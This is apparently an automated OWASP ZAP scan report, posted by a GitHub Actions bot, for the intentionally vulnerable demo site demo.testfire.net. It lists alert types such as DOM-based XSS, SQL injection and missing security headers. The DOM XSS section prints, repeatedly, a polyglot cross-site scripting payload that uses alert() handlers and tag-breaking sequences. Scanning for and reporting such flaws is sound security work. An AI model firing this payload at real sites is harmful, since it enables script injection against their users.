ZAP Full Scan Report
Created by: github-actions[bot]

Site: http://demo.testfire.net

Site: https://demo.testfire.net

New Alerts

- Cross Site Scripting (DOM Based) [40026] total: 49:
  - [https://demo.testfire.net#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e)
  - [https://demo.testfire.net/#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e)
  - [https://demo.testfire.net/admin#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/admin#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e)
  - [https://demo.testfire.net/cgi.exe#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/cgi.exe#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e)
  - [https://demo.testfire.net/default.jsp?content=security.htm#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/default.jsp?content=security.htm#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e)
  - ..
- Cross Site Scripting (Reflected) [40012] total: 2:
- SQL Injection [40018] total: 4:
- Absence of Anti-CSRF Tokens [10202] total: 11:
- Anti-CSRF Tokens Check [20012] total: 49:
- Content Security Policy (CSP) Header Not Set [10038] total: 12:
- Insecure HTTP Method - PUT [90028] total: 67:
  - https://demo.testfire.net/cgi.exe/eb05ro2hms
  - https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com/zeie48g9rx
  - https://demo.testfire.net/Documents/JohnSmith/cgi.exe/gqjah8f8w0
  - https://demo.testfire.net/Documents/JohnSmith/VoluteeringInformation.pdf/j7cr6k0t9c
  - https://demo.testfire.net/Documents/JohnSmith/z6gbvuagu2
  - ..
- Missing Anti-clickjacking Header [10020] total: 11:
- Relative Path Confusion [10051] total: 78:
- Secure Pages Include Mixed Content (Including Scripts) [10040] total: 1:
- Source Code Disclosure - SQL [10099] total: 1:
- Sub Resource Integrity Attribute Missing [90003] total: 1:
- Cookie Slack Detector [90027] total: 93:
- Cookie without SameSite Attribute [10054] total: 3:
- Cross-Domain JavaScript Source File Inclusion [10017] total: 1:
- Dangerous JS Functions [10110] total: 3:
- HTTPS Content Available via HTTP [10047] total: 56:
- Permissions Policy Header Not Set [10063] total: 11:
- Secure Pages Include Mixed Content [10040] total: 2:
- Server Leaks Version Information via "Server" HTTP Response Header Field [10036] total: 11:
- Strict-Transport-Security Header Not Set [10035] total: 11:
- Timestamp Disclosure - Unix [10096] total: 2:
- X-Content-Type-Options Header Missing [10021] total: 11:
- Cookie Slack Detector [90027] total: 2:
- Information Disclosure - Suspicious Comments [10027] total: 15:
  - https://demo.testfire.net/index.jsp?content=inside_jobs.htm
  - https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=CustomerServiceRepresentative:CustomerService
  - https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=ExecutiveAssistant:Administration
  - https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=LoyaltyMarketingProgramManager:Marketing
  - https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=MortgageLendingAccountExecutive:Sales
  - ..
- Modern Web Application [10109] total: 6:
  - https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
  - https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
  - https://demo.testfire.net/index.jsp?content=inside.htm
  - https://demo.testfire.net/index.jsp?content=inside_volunteering.htm
  - https://demo.testfire.net/index.jsp?content=personal_other.htm
  - ..
- Re-examine Cache-control Directives [10015] total: 11:
- Session Management Response Identified [10112] total: 5:
- Storable and Cacheable Content [10049] total: 11:
- User Agent Fuzzer [10104] total: 108:
- Cross Site Scripting (DOM Based) [40026] total: 49:

View the following link to download the report. RunnerID: 7782131864